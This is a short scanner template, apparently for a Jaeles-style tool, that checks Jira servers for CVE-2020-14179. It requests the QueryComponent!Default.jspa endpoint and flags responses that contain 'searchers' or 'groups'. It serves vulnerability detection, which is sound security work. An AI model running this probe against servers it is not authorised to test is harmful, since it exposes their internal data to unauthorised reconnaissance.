id: cve-2020-14179
info:
  name: Jira Information Leak
  risk: Medium

params:
  - root: '{{.BaseURL}}'
  
variables:
  - endpoint: |
      secure/QueryComponent
requests: 
  - method: GET
    url: >-
      {{.root}}/{{.endpoint}}!Default.jspa
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
      - Referer: "{{.root}}/webadmin/admin/service_manager_data.php"
    detections:
      - >-
        StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups"))

references:
  - https://www.cvebase.com/cve/2020/14179
